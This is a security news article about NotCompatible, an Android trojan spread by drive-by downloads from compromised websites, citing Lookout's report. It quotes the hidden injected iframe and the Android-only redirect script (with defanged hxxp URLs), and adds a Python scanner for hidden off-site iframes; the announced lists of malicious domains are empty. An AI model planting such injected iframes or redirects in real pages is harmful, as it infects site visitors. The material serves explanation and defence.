

Fandroids are plagued with malware left and right. Their devices can be infected by apps downloaded from Google Play, and especially from unofficial third-party app stores. Worse, drive-by download malware is now targeting Android devices.
NotCompatible
Lookout Mobile Security recently identified a drive-by download malware dubbed NotCompatible. Drive-by downloads are common on PCs: when a user visits an infected site, the malware secretly infects the computer if it doesn’t have updated security measures.
NotCompatible works in a similar manner: if someone uses an Android device to visit an infected site, the web browser automatically downloads an application, and when the download finishes, the device displays a notification prompting the user to click on it to install the downloaded app. The installation only proceeds if the “Unknown sources” setting is enabled (this feature is commonly referred to as “sideloading”); otherwise it is blocked.
Lookout’s report stated that infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
When a PC web browser is used to access the infected site, a “not found” error appears, but if a web browser containing the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
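For site owners checking their own pages for this kind of injection, the following is an added example (not from Lookout's report or the original article) that flags iframes hidden by inline style or zero size whose source is on another host. The class and function names, the `example.com` site host and the sample page are constructed for illustration; the flagged iframe is the one quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDDEN_MARKERS = ("display:none", "visibility:hidden")

class HiddenIframeFinder(HTMLParser):
    """Collect iframes that are hidden and load from a host other than the site's own."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").lower().replace(" ", "")
        hidden = any(m in style for m in HIDDEN_MARKERS)
        zero = any(a.get(d, "").strip() in ("0", "0px") for d in ("width", "height"))
        src = a.get("src", "").strip()
        # Reports defang URLs as hxxp://; undo that so the host can be parsed.
        url = "http" + src[4:] if src.lower().startswith("hxxp") else src
        host = (urlparse(url).hostname or "").lower()
        same_site = host == self.site_host or host.endswith("." + self.site_host)
        if (hidden or zero) and host and not same_site:
            self.findings.append({"line": self.getpos()[0], "host": host, "src": src})

def find_hidden_external_iframes(html, site_host):
    """Return one finding per hidden iframe whose src is off-site."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page for site "example.com": a visible widget, a hidden
# same-site frame, and the injected iframe quoted in the article.
SAMPLE_PAGE = """<html><body>
<p>Welcome</p>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<iframe style="display:none" src="/local-tracker.html"></iframe>
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
</body></html>"""

if __name__ == "__main__":
    for f in find_hidden_external_iframes(SAMPLE_PAGE, "example.com"):
        print(f"line {f['line']}: hidden iframe loading from {f['host']}")
```

A hit is a lead to review, not a verdict: legitimate analytics and ad tags also use hidden off-site frames, so compare findings against the third-party hosts the site is known to embed.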
Lookout identified the following sites serving malicious Android apps:
While Command and Control (C&C) domains include:
Lookout assured their subscribers that they are protected from NotCompatible, and reiterated that unless the app is actually installed, the device won’t become infected.
“Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update,” Lookout wrote in their updated report.
“This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.”